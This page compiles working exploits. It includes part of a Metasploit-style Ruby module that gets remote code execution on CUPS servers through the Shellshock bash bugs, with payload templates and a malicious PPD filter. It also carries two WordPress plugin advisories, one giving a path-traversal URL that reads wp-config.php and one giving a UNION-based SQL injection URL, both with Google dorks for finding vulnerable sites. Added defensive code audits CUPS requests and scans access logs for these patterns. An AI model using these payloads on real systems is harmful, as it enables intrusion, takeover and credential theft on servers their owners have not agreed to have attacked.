      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))
    register_options([
      Opt::RPORT(631),
      OptBool.new('SSL', [ true, 'Use SSL', true ]),
      OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
      OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
      OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
      OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
    ], self.class)
  end
 
  #
  # CVE-2014-6271
  #
  def cve_2014_6271(cmd)
    %{() { :;}; $(#{cmd}) & }
  end
 
  #
  # CVE-2014-6278
  #
  def cve_2014_6278(cmd)
    %{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }}
  end
 
  #
  # Check credentials
  #
  def check
    @cookie = rand_text_alphanumeric(16)
    printer_name = rand_text_alphanumeric(10 + rand(5))
    res = add_printer(printer_name, '')
    if !res
      vprint_error("#{peer} - No response from host")
      return Exploit::CheckCode::Unknown
    elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/
      vprint_status("#{peer} - Found CUPS version #{$1}")
    else
      print_status("#{peer} - Target is not a CUPS web server")
      return Exploit::CheckCode::Safe
    end
    if res.body =~ /Set Default Options for #{printer_name}/
      vprint_good("#{peer} - Added printer successfully")
      delete_printer(printer_name)
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      vprint_error("#{peer} - Authentication failed")
    elsif res.code == 426
      vprint_error("#{peer} - SSL required - set SSL true")
    end
    Exploit::CheckCode::Detected
  end
 
  #
  # Exploit
  #
  def exploit
    @cookie = rand_text_alphanumeric(16)
    printer_name = rand_text_alphanumeric(10 + rand(5))
 
    # Select target CVE
    case datastore['CVE']
    when 'CVE-2014-6278'
      cmd = cve_2014_6278(payload.raw)
    else
      cmd = cve_2014_6271(payload.raw)
    end
 
    # Add a printer containing the payload
    # with a CUPS filter pointing to /bin/bash
    res = add_printer(printer_name, cmd)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
    elsif res.body =~ /Set Default Options for #{printer_name}/
      print_good("#{peer} - Added printer successfully")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
    elsif res.code == 426
      fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not add printer.")
    end
 
    # Add a test page to the print queue.
    # The print job triggers execution of the bash filter
    # which executes the payload in the environment variables.
    res = print_test_page(printer_name)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
    elsif res.body =~ /Test page sent; job ID is/
      vprint_good("#{peer} - Added test page to printer queue")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
    elsif res.code == 426
      fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.")
    end
 
    # Delete the printer
    res = delete_printer(printer_name)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
    elsif res.body =~ /has been deleted successfully/
      print_status("#{peer} - Deleted printer '#{printer_name}' successfully")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.")
    elsif res.code == 426
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.")
    else
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}'")
    end
  end
 
  #
  # Add a printer to CUPS
  #
  def add_printer(printer_name, cmd)
    vprint_status("#{peer} - Adding new printer '#{printer_name}'")
 
    ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd"
    ppd_file = <<-EOF
*PPD-Adobe: "4.3"
*%==== General Information Keywords ========================
*FormatVersion: "4.3"
*FileVersion: "1.00"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PCFileName: "#{ppd_name}"
*Manufacturer: "Brother"
*Product: "(Brother MFC-3820CN)"
*1284DeviceID: "MFG:Brother;MDL:MFC-3820CN"
*cupsVersion: 1.1
*cupsManualCopies: False
*cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash"
*cupsModelNumber: #{rand(10) + 1}
*ModelName: "Brother MFC-3820CN"
*ShortNickName: "Brother MFC-3820CN"
*NickName: "Brother MFC-3820CN CUPS v1.1"
*%
*%==== Basic Device Capabilities =============
*LanguageLevel: "3"
*ColorDevice: True
*DefaultColorSpace: RGB
*FileSystem: False
*Throughput: "12"
*LandscapeOrientation: Plus90
*VariablePaperSize: False
*TTRasterizer: Type42
*FreeVM: "1700000"
 
*DefaultOutputOrder: Reverse
*%==== Media Selection ======================
 
*OpenUI *PageSize/Media Size: PickOne
*OrderDependency: 18 AnySetup *PageSize
*DefaultPageSize: BrLetter
*PageSize BrA4/A4:        "<</PageSize[595 842]/ImagingBBox null>>setpagedevice"
*PageSize BrLetter/Letter:      "<</PageSize[612 792]/ImagingBBox null>>setpagedevice"
EOF
 
    pd = Rex::MIME::Message.new
    pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}"))
    pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid"))
    pd.add_part("add-printer", nil, nil, %(form-data; name="OP"))
    pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME"))
    pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable
    pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable
    pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI"))
 
    data = pd.to_s
    data.strip!
 
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'ctype' => "multipart/form-data; boundary=#{pd.bound}",
      'data' => data,
      'cookie' => "org.cups.sid=#{@cookie};",
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
    )
  end
 
  #
  # Queue a printer test page
  #
  def print_test_page(printer_name)
    vprint_status("#{peer} - Adding test page to printer queue")
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'printers', printer_name),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => "org.cups.sid=#{@cookie}",
      'vars_post' => {
        'org.cups.sid' => @cookie,
        'OP' => 'print-test-page'
      }
    )
  end
 
  #
  # Delete a printer
  #
  def delete_printer(printer_name)
    vprint_status("#{peer} - Deleting printer '#{printer_name}'")
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => "org.cups.sid=#{@cookie}",
      'vars_post' => {
        'org.cups.sid' => @cookie,
        'OP' => 'delete-printer',
        'printer_name' => printer_name,
        'confirm' => 'Delete Printer'
      }
    )
  end
 
end
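A defender-side check for the request the module's `add_printer` builds, added here as an example and not part of the Metasploit module: it audits an add-printer form submission for a bash function definition in the free-text fields and for a PPD `*cupsFilter` line whose program is a shell. The method names, the shell list and the sample values are assumptions made for illustration, and the fields are assumed to be already parsed from the multipart body into a hash.

```ruby
# Added example: audit the fields of a CUPS "add-printer" form submission.
# Field names (PRINTER_INFO, PRINTER_LOCATION, PPD_FILE) are the ones the
# module above sends; everything else here is hypothetical.

SHELL_NAMES = %w[sh bash dash ksh zsh].freeze
# Text that starts like a bash function definition: "() {"
FUNC_DEF = /\A\s*\(\)\s*\{/

# Return the program named by each *cupsFilter / *cupsFilter2 line of a PPD.
# Assumes the program path contains no spaces, so it is the last token.
def cups_filter_programs(ppd_text)
  ppd_text.scan(/^\*cupsFilter2?:\s*"([^"]*)"/).map { |(value)| value.split.last }.compact
end

# Return a list of findings (empty when nothing looks wrong).
def audit_add_printer(fields)
  findings = []
  %w[PRINTER_INFO PRINTER_LOCATION].each do |name|
    value = fields.fetch(name, '')
    findings << "#{name}: starts with a bash function definition" if value.match?(FUNC_DEF)
  end
  cups_filter_programs(fields.fetch('PPD_FILE', '')).each do |program|
    next unless SHELL_NAMES.include?(File.basename(program))
    findings << "PPD_FILE: cupsFilter program is a shell (#{program})"
  end
  findings
end

# Constructed samples: one shaped like the module's request, one ordinary.
SAMPLE_SUSPICIOUS = {
  'PRINTER_INFO' => '',
  'PRINTER_LOCATION' => '() { _; } >_[$($())] { echo constructed; }',
  'PPD_FILE' => <<~PPD
    *PPD-Adobe: "4.3"
    *cupsFilter: "application/vnd.cups-postscript 0 /bin/bash"
  PPD
}.freeze

SAMPLE_BENIGN = {
  'PRINTER_INFO' => 'Colour inkjet',
  'PRINTER_LOCATION' => 'Room 4, second floor',
  'PPD_FILE' => %(*PPD-Adobe: "4.3"\n*cupsFilter: "application/vnd.cups-postscript 0 examplefilter"\n)
}.freeze

puts audit_add_printer(SAMPLE_SUSPICIOUS)
```
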


28Oct/140

WordPress Download Manager Arbitrary File Download

# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and GNU/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find a website that uses /plugins/download-manager/ and add to the link: /views/file_download.php?fname=../../wp-config.php


28Oct/140

WordPress HTML5 / Flash Player SQL Injection

# WordPress HTML5 and Flash Player Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and GNU/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Vulnerable sites are those that have the settings.php file inside the /player/ directory...
 
 ~ After finding this file, we need to append this string to the link: "?playlist=1&theme=1"
 
OR:
 
 ~ Search for vulnerable parameters of settings.php with Google dorks.
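
Detection for the two WordPress advisories above (the `fname` file download and the `theme` SQL injection), added here as an example and not part of either advisory: it scans web access-log lines for a `..` path segment in `fname` and for UNION SELECT or `information_schema` in `theme`, after percent-decoding the values. The log lines are constructed samples, and the method names and rule table are assumptions.

```ruby
require 'uri'

# Parameter => [finding label, pattern applied to the fully decoded value].
RULES = {
  'fname' => [:path_traversal, %r{(?:\A|[/\\])\.\.(?:[/\\]|\z)}],
  'theme' => [:sql_injection, /\bunion\b.*\bselect\b|\binformation_schema\b/i]
}.freeze

# Percent-decode until the value stops changing, so nested encodings are
# compared in their final form.
def fully_decode(value, rounds = 3)
  rounds.times do
    decoded = begin
      URI.decode_www_form_component(value)
    rescue ArgumentError # malformed %-escape: keep the raw text
      value
    end
    return decoded if decoded == value
    value = decoded
  end
  value
end

# Return [label, parameter] pairs for one access-log line.
def scan_line(line)
  target = line[/"(?:GET|POST|HEAD) (\S+) HTTP/, 1]
  return [] unless target
  target.split('?', 2)[1].to_s.split('&').each_with_object([]) do |pair, hits|
    key, value = pair.split('=', 2)
    label, pattern = RULES[fully_decode(key.to_s)]
    hits << [label, key] if label && fully_decode(value.to_s).b.match?(pattern)
  end
end

def scan_log(text)
  text.each_line.map { |line| scan_line(line) }
end

# Constructed sample log lines (documentation addresses, made-up sizes).
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [28/Oct/2014:10:00:01 +0000] "GET /wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php HTTP/1.1" 200 3120
  192.0.2.10 - - [28/Oct/2014:10:00:05 +0000] "GET /wp-content/plugins/document_manager/views/file_download.php?fname=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3120
  198.51.100.7 - - [28/Oct/2014:10:02:11 +0000] "GET /wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,table_name+from+information_schema.tables-- HTTP/1.1" 200 512
  203.0.113.5 - - [28/Oct/2014:10:03:40 +0000] "GET /wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1 HTTP/1.1" 200 498
  203.0.113.5 - - [28/Oct/2014:10:04:02 +0000] "GET /wp-content/plugins/document_manager/views/file_download.php?fname=report..final.pdf HTTP/1.1" 200 90211
LOG

scan_log(SAMPLE_LOG).each_with_index { |hits, i| puts "line #{i + 1}: #{hits.inspect}" }
```

A hit with a 200 status on `wp-config.php` means the database credentials in that file should be treated as exposed and rotated.
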
